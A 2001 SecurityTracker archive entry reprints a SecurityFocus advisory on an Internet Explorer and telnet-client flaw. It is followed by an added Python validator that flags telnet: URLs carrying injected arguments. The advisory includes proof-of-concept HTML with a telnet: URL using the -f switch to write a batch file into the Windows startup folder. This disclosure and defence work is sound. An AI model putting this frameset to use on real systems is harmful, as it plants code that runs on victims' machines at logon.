SecurityTracker.com
SecurityTracker Archives

Category:   Application (Web Browser)  >   Microsoft Internet Explorer
Vendors:   Microsoft
Microsoft Internet Explorer with Services for Unix 2.0 Can Create Malicious Files on the User's Host
SecurityTracker Alert ID:  1001088
SecurityTracker URL:  http://securitytracker.com/id/1001088
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Mar 15 2001
Impact:   Modification of system information, Modification of user information
Fix Available:  Yes
Vendor Confirmed:  Yes
Exploit Included:  Yes
Version(s): All versions of IE with Services for Unix 2.0
Description:   SecurityFocus.com discovered and reported a vulnerability in the interaction between Microsoft Internet Explorer (IE) and the Telnet client installed with Microsoft's "Services for Unix 2.0": a malicious web page or web script can cause IE to invoke the telnet client in a way that overwrites or creates a file on the browser's host.

The Windows 2000 Telnet client reportedly contains a client-side logging feature, normally used to record telnet session data to a file. It is enabled by passing the "-f" flag to the telnet command, followed by a filename. IE passes the command-line parameters contained in a telnet: URL straight to the telnet program, so the vulnerability can be exploited by hiding such a URL within a web page or an HTML-based e-mail (read by, for example, Microsoft Outlook).

The vulnerability can overwrite or create files and could be used to place a malicious batch file in a startup directory, where the system executes it at the next user logon.

Some demonstration exploit code is contained in the original report.

All versions of Internet Explorer with Services for Unix 2.0 installed are presumed to be vulnerable to this problem.

Impact:   By hiding malicious code within a web page or an HTML-based e-mail (read by, for example, Microsoft Outlook), an attacker can cause files to be created or overwritten on the user's host (with the privileges of the user reading the HTML). This could lead to the execution of malicious programs on the user's host.
Solution:   The vendor has released updates for Internet Explorer 5.01 Service Pack 1 and Internet Explorer 5.5 Service Pack 1.
Vendor URL:  www.microsoft.com/technet/security/bulletin/MS01-015.asp
Cause:   Input validation error
Underlying OS:  Windows (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Vendor Releases Revised Fix) Re: Microsoft Internet Explorer with Services for Unix 2.0 Can Create Malicious Files on the User's Host
The vendor has released an updated fix to supersede the previous fix.



 Source Message Contents

Subject:  Internet Explorer and Services for Unix 2.0 Telnet Client


                          SecurityFocus.com
                     http://www.securityfocus.com

              Vulnerability Report For Internet Explorer
               and Services for Unix 2.0 Telnet Client



Date Published: 13 March 2001

Advisory ID: n/a

Bugtraq ID: 2463

CVE CAN: None currently assigned.

Title: Services for Unix 2.0 Telnet Client File Overwrite
       Vulnerability

Class: Input Validation Error

Remotely Exploitable: Yes

Locally Exploitable: Yes


Vulnerability Description:
=========================

A vulnerability has been discovered in the interaction between
Internet Explorer and the Telnet client installed with Services
for Unix 2.0, that allows arbitrary files to be overwritten, or
created, containing attacker specified data.  This vulnerability
occurs as a result of Internet Explorer executing the "telnet"
command and passing command line parameters, specified in the
URL, to the telnet program.

The Windows 2000 Telnet client contains a client side logging
option, which is used to log all telnet session data to a file
specified by this option.  By specifying the "-f" flag to the
telnet command, accompanied by a filename, all session text is
logged to this file.


Vulnerable Packages/Systems:
===========================

All versions of Internet Explorer with Services for Unix 2.0
installed are presumed to be vulnerable to this problem.

Solution/Vendor Information/Workaround:

Microsoft has released an update which solves this problem.  The
update, and more information can be obtained at the following
locations:

http://www.microsoft.com/technet/security/bulletin/MS01-015.asp
http://www.microsoft.com/windows/ie/download/critical/q286043/default.asp

Updates are available for Internet Explorer 5.01 Service Pack 1
and Internet Explorer 5.5 Service Pack 1.


Vendor notified on:
==================

November 1, 2000


Credits:
=======

This vulnerability was discovered by Oliver Friedrichs
<of@securityfocus.com>.

This advisory was drafted with the help of the SecurityFocus.com
Vulnerability Help Team. For more information or assistance drafting
advisories please mail vulnhelp@securityfocus.com.


Technical Description - Exploit/Concept Code:
============================================

This vulnerability can be reproduced by giving Internet Explorer a
URL such as the following:

telnet:-f%20\file.txt%20host

The above example will cause Internet Explorer to invoke the telnet
client and cause it to connect to the host "host", logging all output
to the file "\file.txt".  An attacker can cause arbitrary data to be
written to this file by setting up a rogue server, such as netcat,
which is listening on the telnet port, sending their desired data to
the client.  Arbitrary port numbers can also be specified on the
telnet command line, so the server need not listen on port 23.

Furthermore, the invocation of the telnet client can be hidden within
existing HTML, automating its execution.  This vulnerability can also
be exploited via Outlook, which by default will automatically process
HTML messages.

<html>
<frameset rows="100%,*">
<frame src=about:blank>
<frame src=telnet:-f%20\Documents%20and%Settings\All%20Users
\start%20menu\programs\startup\start.bat%20host%208000>
</frameset>
</html>

The above example will cause data that is received from port 8000 on
the host "host" to be written to the file "boom.bat" in the startup
directory for all users.  Assuming the logged in user has the
appropriate permissions, this will create a batch file that is
executed upon any future user logon.  Note that if the username is known to
the attacker, this can also be directed towards the logged in user,
who will have permission to create this file.


DISCLAIMER:

The contents of this advisory are copyright (c) 2000 SecurityFocus.com
and may be distributed freely provided that no fee is charged for this
distribution and proper credit is given.




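A defensive check for the pattern the advisory describes, as an added example (not code from SecurityFocus, SecurityTracker or Microsoft): it percent-decodes a telnet: URL and accepts only a plain host with an optional port, so a URL whose body would reach the telnet command line as switches or extra arguments is refused before any external client is launched. The function names, regexes and the hostname in the constructed sample HTML are this example's own assumptions.

```python
"""Validator for telnet: URLs (added example, not from the advisory or vendor).
The advisory's bug is that the URL body reached the telnet command line
unchecked, so "-f <file> <host>" became logging switches; this check
accepts only telnet:[//]host[:port][/] and reports why anything else fails."""
import re
from urllib.parse import unquote

# Plain hostname or IPv4 literal; IPv6 bracket literals are deliberately out of scope.
HOST_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9.-]{0,252}[A-Za-z0-9])?$")
# telnet: values found in src= or href= attributes of HTML (quoted or bare).
TELNET_URL_RE = re.compile(r"""(?:src|href)\s*=\s*["']?\s*(telnet:[^\s"'>]+)""", re.I)


def check_telnet_url(url: str):
    """Return (ok, reason); ok is True only for a bare host and optional numeric port."""
    if not url.lower().startswith("telnet:"):
        return False, "not a telnet: URL"
    target = unquote(url[len("telnet:"):])          # decode %20 etc. BEFORE checking
    if target.startswith("//"):
        target = target[2:]
    target = target.rstrip("/")
    if target.startswith(("-", "/")):               # would reach telnet.exe as a switch
        return False, "target starts with an option prefix"
    if re.search(r"\s", target):                    # extra argv tokens, e.g. "-f file host"
        return False, "whitespace in target would inject extra command-line arguments"
    if "@" in target:
        return False, "userinfo not accepted"       # conservative: never forward credentials
    host, sep, port = target.partition(":")
    if not HOST_RE.match(host):
        return False, "host is not a plain hostname or IPv4 address"
    if sep and not (port.isdigit() and 1 <= int(port) <= 65535):
        return False, "port is not a number in 1..65535"
    return True, "ok"


def scan_html(html: str):
    """List (url, reason) for every telnet: src/href in the HTML that fails the check."""
    flagged = []
    for url in TELNET_URL_RE.findall(html):
        ok, reason = check_telnet_url(url)
        if not ok:
            flagged.append((url, reason))
    return flagged


# Constructed sample page in the shape of the advisory's frameset ("host" is a placeholder).
SAMPLE_HTML = r"""<html><frameset rows="100%,*">
<frame src=about:blank>
<frame src=telnet:-f%20\file.txt%20host%208000>
<a href="telnet://example.com:23/">console</a>
</frameset></html>"""
```

Running scan_html over SAMPLE_HTML flags only the frame whose decoded body begins with "-f", while the plain host:port link passes.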

Copyright 2021, SecurityGlobal.net LLC